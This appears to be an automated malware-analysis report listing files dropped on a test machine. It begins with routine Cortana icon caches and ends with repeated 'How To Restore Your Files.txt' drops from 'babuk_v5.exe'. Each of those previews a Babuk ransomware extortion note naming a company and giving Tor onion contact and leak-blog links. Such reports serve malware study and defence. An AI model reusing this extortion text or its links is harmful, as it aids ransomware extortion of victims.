                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_ActiveX_VBScript
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.237492402645553
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqXjsdB3g6G7OdE5qOppcWfswKnZFwG6uDPvdHk:HsdBg6qjpLkwOEG6QndHk
                                                                            MD5:A9FFA788D43CA6DBFD91F153E8A3974D
                                                                            SHA1:14DF0A56B28F230ED98BC3C0075C9208B41FF807
                                                                            SHA-256:F300BAAE15663E4A4AC43A5BB30A85FCC2E2B40D9B7007A8300873300FCC563B
                                                                            SHA-512:3C5679F8A17180ACC5C22C3A13F00C6D0B13C7EABF37AA27340EBDF2ADF89C376912ADAC8B70C490D5DA97FBEE4F9F6704172D51FCDDF74FF8F8BCC5ABF8C911
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW..................................................................................................................................................................................................................................................................................................................................................................................................................................................~...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt_chm
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):1.185499439627167
                                                                            Encrypted:false
                                                                            SSDEEP:12:+/qY5Oea/uwuOea/uwuOealeaHupa/u+a/uBePYuBeua/uvAuxuWu2uWu2uWuou4:cqa
                                                                            MD5:CB75C0AD5D4EDBDC7750ACFA22E0BB29
                                                                            SHA1:FB36284185BD063AEDB64DBD6F3A485CF70A109F
                                                                            SHA-256:878A1ED83FCFC18F0C0EA736BB2E5B890EFD7F744359FFDBF88E2CE4EB3FB83C
                                                                            SHA-512:D44B53886E954F70EC58C8D0940D4C8CDD94E9EA2F1DED5DD6C92F9B0105C4B25D59F44E19A2E4AEB93815D50D5473EEC40B71EC67902AB2A3F1E987E9BA83DF
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Examples
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.0968908207697585
                                                                            Encrypted:false
                                                                            SSDEEP:48:51Fxh6f0zBXUJg9qvxgnkYHqCRak4ibYzn:3LhY01XUDeQRcYj
                                                                            MD5:A3093C6392BC66946591CCC28C8FB5ED
                                                                            SHA1:DA9ABF5443086860B9847AD243F2420AD5AD025D
                                                                            SHA-256:87E197AA72AF5858F40FCFE10EDB8D22C367221858F356F954D25FC4E0C33FFB
                                                                            SHA-512:3DE0013D142B84B952E1A7A50AA10C125F241BF978D645CAE222EEBEC0BB6ABB0792664AA07A88FEBDF2B18355A579806961AA584AF26F2185AB2A13FFF99BBC
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................................................................................................................................................................................................................................................................0..........................................................................................................................`............................................................................................................................................................................................................................................................................b...d...f...h...k...n...p...s...v...x...{...~...................................................................................b...d...f...h...k...n...p...s...v...x...{.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_SciTE_SciTE_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):6.157442191616183
                                                                            Encrypted:false
                                                                            SSDEEP:96:3k7J5Wr/egnoN0NgCIxphY/+mV47GYLPX/TL+A:3k7y/oN08xXyVA5/7
                                                                            MD5:6E56FD21751B46571AAB9DE0B6E6A060
                                                                            SHA1:F38E64420C4CBA2956F4D8FFAB6E864F9B50CF0F
                                                                            SHA-256:C92B21BD526E8DB04A1FFBB9A89AC1561232400059AF880D1017FEBC4897DDB1
                                                                            SHA-512:F169FEDB19D4468D8EFE8D565562707683ACC38E794DF4E1CF54CD4E2847DF051F3285A3D24F6EB18EFD44215E4D9900D4DE519CA96E5DB0C65AC4FBD8CDCD42
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................................................*"".!!.["...'!..#...1&#.4'$.#..."... ......[""".........................................................................((#3&"".) .."...6)%.H4..M6/.R80.D0*.6(%.J5..@.).<*%.'.......##.3........................................................***.($#.5)%.9)$.Q;6.L:6.B1-.L60.<.+.D30.<.+.F51.1'%.=0-.>2-.C3/.* .., ..#...*...............................................''"-3)'.F1*.M5/.S=:.eF>.]?6.iKE.]E@.^D>.\;1.lG;.Y=5.G50.I85.P;5.L5/.W@9.H4-.+ ......"""-....................................''':9/,.P7/.S<8.M<;.....C/(..YM.yQJ.uJ=.a>2.fD:.qQI.cIC.nNE.\B;.pPF.,$".J?>.....K:4.0#..&...'##:............................((",;0-.Y=5._HE.Q=;.0!...iZ...m..M<.c:,.aB:.tSN.uYU.dLF.iKC.iND.dI@.lOF..n`.Y>6.^>5.kG<.gB6.hC6.-"..""",....................---.<0..G4/.lQN.P=;.wH8........qD3.g6'..`R..to..b].sSH.ZC;.cKC.dIB..bX..c
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_MSACCESS_EXE
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.022256232591177
                                                                            Encrypted:false
                                                                            SSDEEP:96:XGfevXfevXf58KvXfgvXf9vXfuvDU9v5d8888S2vLGvWivduvh9vzd8888S2vOGe:XGfevXfevXf58KvXfgvXf9vXfuvY9v5M
                                                                            MD5:8829AEB1031D3D9A713E4CF8BC3A1504
                                                                            SHA1:FFC77D0744FDA55C02161CDD9387DC19CD9E1FCB
                                                                            SHA-256:CBE171937436CEAEFB0A39A1E1F64AD40DC676B94BEFF8014247E84CD352C3B4
                                                                            SHA-512:3BCC0D68F9683A9D1CC1503128A239ACB96A62C68DFB64A01186D98DB96CE0AEAC10AF6620E5433FB0B392A077C495A7C4B9339120F02993B4E1C99FE1961999
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................................................................................8/......................................................................................................?*..83.674.f64..64..63..63..................................................................................:5.085.Z86..85..95..85..85..74..74..74..74..63..........................................................;;..=9.K;7.x:8..;7..;8..:7..:7..96..96..96..85..85..74..74..74..74..63..........................................................<9..<9..;8..;8..;8..;8..:7..:7..96..96..96..85..85..74..74..74..74..63..........................................................<9..<9..;8..;8..;8..;8..:7..:7..96..96..96..85..85..74..74..74..74..63..95..85..96..96..96..96..95..95..75.i<0..................<9..<9..;8..;8..;8..;8..:7..:7..96..96..96..85..85..74..74..74..74..63........
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_MSPUB_EXE
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.5526609980030193
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqPhwXderururHr98r9Frrr989OVJ9e9QCHhXWFRaKG9Ir9Ir8rmrgrazrRA26rq:eXUqqLh8hFnhAgy3HhyR/qIhIoyEkdU
                                                                            MD5:CBC17E9089C38894379216144A17A426
                                                                            SHA1:05A6653D0ADA2C6F174C4F36F8DA88EF713781F5
                                                                            SHA-256:E0FB86515AEAA6BE86C2F5D706EBB2EB48358D8D29DA039ADBD7B4F0181C93D8
                                                                            SHA-512:DABE0C3F9AAAC78F82870E88C3D04CB8DB5A993E58128C17F3C407BC05A8BE4981A8A74A036C055129062125D4A5222EF2ED47BFDA82C5F1B3F7AD3C8FECE223
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................................................................................^q......................................................................................................jj..cq.6dp.fdp..co..an..bn..................................................................................jt.0hw.Zgu..gt..fr..fr..er..dq..dp..co..bo..bn..........................................................nw..lz.Kly.xky..iw..jw..iv..hv..hu..gt..fs..fr..er..dq..dp..co..bo..bn..........................................................lz..lz..ly..ky..jx..jw..iv..hv..hu..gt..fs..fr..er..dq..dp..co..bo..bn..........................................................lz..lz..ly..ky..jx..jw..iv..hv..hu..gt..fs..fr..er..dq..dp..co..bo..bn..gt..gt..gt..gt..gt..gt..gt..gt..ft......................lz..lz..ly..ky..jx..jw..iv..hv..hu..gt..fs..fr..er..dq..dp..co..bo..bn........
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_ONENOTE_EXE
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.6510423273820805
                                                                            Encrypted:false
                                                                            SSDEEP:48:EBcFAcVSDDDDDDDzV3MVyWVyZVSDDDDdZVyZuZEDDDDdNn6TW8DDDDdZcZ1ZGDD2:gKA7Q
                                                                            MD5:0B46DF459CA2118151F3A1CDBE8A1E10
                                                                            SHA1:8886810E9BF3270EA9534D1D38EB8DF822B0E184
                                                                            SHA-256:1A9406047CA62F61BFF29B239E215379E2B7CEBB65960B194FCEDF064469CFA6
                                                                            SHA-512:122F32E69FED3CD537B9AB184711799486090303ED994C4FD7EA73C5057C2974CF6A743FDAD55852D951E523AB6CC40DDA215C7D75BAD1BC176FB67D112CAF99
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................................................................................q8z......................................................................................................?..v8z6x7}fu6z.t5y.u5x.t5y..................................................................................:.0|8.Zz8..y8..x8~.x7}.w7|.w6|.v6{.u6z.u6y.t5y..........................................................;...9.K.9.x.:..}9..}:..}9..|9..{8..z8..y8~.x7}.w7|.w6|.v6{.u6z.u6y.t5y..........................................................;...;...:...:..~:..}:..}9..|9..{8..z8..y8~.x7}.w7|.w6|.v6{.u6z.u6y.t5y.z8..z8..z8..z8..z8..z8..z8..z8..z8..z8~..................;...;...:...:..~:..}:..}9..|9..{8..z8..y8~.x7}.w7|.w6|.v6{.u6z.u6y.t5y.....................................z8..y7..z7~{.........;...;...:...:..~:..}:..}9..|9..{8..z8..y8~.x7}.w7|.w6|.v6{.u6z.u6y.t5y.......
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_OcPubMgr_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.4853575089640523
                                                                            Encrypted:false
                                                                            SSDEEP:48:7sB1UnRXFhYCRrK98lgzBh/qQKb/ttYZA1VlFBq+yw4J:eURXFn41MbrB1VXIw+
                                                                            MD5:2C177A8E3D2290969576F10F229C237C
                                                                            SHA1:3E42D3728EF193BBA05F20ACD2C9A9EAACBA55BB
                                                                            SHA-256:DFAA0C946813D8615F2FFB8E97BA7B10450EA2566ED929BE73AFE85EE047B588
                                                                            SHA-512:1177B06547A2403052FCEC4CEDB65707B2956A0D16AA30CB1FB538D7E6CD4A283E21BEA6AFECFBEFFECF68630A3CD940536EAE90A8F1C664DF2CE262F1E78ADA
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW........................................................................................................................................................................................................................................................................................g....................8..................................................................N.....................................................................................................w................................o..................m....................................................9..............k.................................................................................................._........................................................................................$.........................._........H...............................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_msoev_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.0658774540515137
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqTrqaCCCCCC4quSVuHzSyCCCCxd6TCCCC2NxJCCCCmqBhCCCCCCCTCCCCCCCCC3:Prq35SVMzS466NWIbeJ+OWv
                                                                            MD5:4AC54A076B85B661EAE9A3B14305A72E
                                                                            SHA1:7504D2386989E002410714187077E73B28B031AD
                                                                            SHA-256:C56F25E6742DFF819E53CE3F1354A6C20520B312E15C59E46A595A87B96758D2
                                                                            SHA-512:E571C4C47DAA8417384960AEE567D3BDD9A404A4E77371E11FC49BB6BA32DF466096E46D70B3D89E48B9B112B0CA3FA4B703A614B26B10C1D98E0E7CEC43B4B8
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW......................................................................................................................................................................................................J.........................................................................................................................J...J...R..................................................................................................................J...J...R..................................................................................................................J...J...R........................................................................................c..c................J...J...R..................................................................................k...J...J...J...J...J...J...Z...J...J...R...................................................................................J...J..........
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\CortanaTrace1.etl
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.12764594958611664
                                                                            Encrypted:false
                                                                            SSDEEP:12:BFEzXZ/Ey6q9995n6LlXY6iK8tOQ1UMCl2rjoD7CePglyDQqTEH:fOl68d6LlXY6iKUPSMClCjoHCeIlyjT8
                                                                            MD5:7D346BE1445CDFE0A3C3C462C54E1594
                                                                            SHA1:BF14569FBE8E607376BA800F25C2529D73909466
                                                                            SHA-256:8CFF72F9657F9B8BE5893F1B333F2519DF9F87FBA323CA1C618BA348E589848C
                                                                            SHA-512:7477FA5AFB25CE7CD1F6173A50D9E26F8981A6026B1A8548DE02B5F47E600CB5FDCD98A576E04C362F520ECCD103E282BBE6E381F2293DE0523A5AA20A08E067
                                                                            Malicious:false
                                                                            Preview: ............................................................................j...........\.\......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................T..3..... .....\.\.............C.7.C.B.3.E.B.D.-.9.9.8.4.-.4.2.9.F.-.A.4.2.8.-.B.6.E.5.1.2.5.8.A.0.B.5...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.a.c.k.a.g.e.s.\.M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...C.o.r.t.a.n.a._.c.w.5.n.1.h.2.t.x.y.e.w.y.\.T.e.m.p.S.t.a.t.e.\.T.r.a.c.e.s.\.C.o.r.t.a.n.a.T.r.a.c.e.1...e.t.l.............P.P.........\.\.............................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\~ortanaUnifiedTileModelCache.tmp
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):133350
                                                                            Entropy (8bit):4.0262497494807326
                                                                            Encrypted:false
                                                                            SSDEEP:3072:u7tpBXu5XNFs9B/hV4aMpI7tpqXu5XNFs9B/hV4aMpH:uh65XNyMpIhL5XNyMpH
                                                                            MD5:87109392F282F8B109A438340607DFC6
                                                                            SHA1:4B9798532AE75EE631C90FF4E0E33BBDEF965F36
                                                                            SHA-256:5C69ED5D98A9F573916CA6C92B2CE3BC312DA369B94BC89FDE79192DDD90B379
                                                                            SHA-512:49F8B7F979C9ED2CC8007EF0EA474049F3BBFA9C4E22A953D4136DF6046F9C85570F5730EC427E00BD43A11170B1427C89E23732F165645BD1561B7150E5A11D
                                                                            Malicious:false
                                                                            Preview: .........6..............|...T.E.}gd.9|.H..|62...........c >*>.GG..!..W,.........`.0o........]...Y.IJ...b.P.........................t...W.~.{.1.A.C.1.4.E.7.7.-.0.2.E.7.-.4.E.5.D.-.B.7.4.4.-.2.E.B.1.A.E.5.1.9.8.B.7.}.\.S.n.i.p.p.i.n.g.T.o.o.l...e.x.e.......t...........W.~.C.h.r.o.m.e...................W.~.{.7.C.5.A.4.0.E.F.-.A.0.F.B.-.4.B.F.C.-.8.7.4.A.-.C.0.F.2.E.0.B.9.F.A.8.E.}.\.A.u.t.o.I.t.3.\.S.c.i.T.E.\.S.c.i.T.E...e.x.e...................P.~.M.i.c.r.o.s.o.f.t...P.e.o.p.l.e._.8.w.e.k.y.b.3.d.8.b.b.w.e.!.x.4.c.7.a.3.b.7.d.y.2.1.8.8.y.4.6.d.4.y.a.3.6.2.y.1.9.a.c.5.a.5.8.0.5.e.5.x...]...Y.IJ...b.P.+...................;9Q.:..@...V".JH.....................L..!-..<...M.i.c.r.o.s.o.f.t...P.e.o.p.l.e._.8.w.e.k.y.b.3.d.8.b.b.w.e.`...M.i.c.r.o.s.o.f.t...P.e.o.p.l.e._.1.0...3...1.0.4.5.2...0._.x.6.4._._.8.w.e.k.y.b.3.d.8.b.b.w.e.........m.s.-.r.e.s.o.u.r.c.e.:.A.p.p.L.i.s.t.N.a.m.e.0...A.s.s.e.t.s.\.P.e.o.p.l.e.A.p.p.L.i.s.t...p.n.g.....4...A.s.s.e.t.s.\.P.e.o.p.l.e.S.m.a.l.l.T.i.l.e...p.n.
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
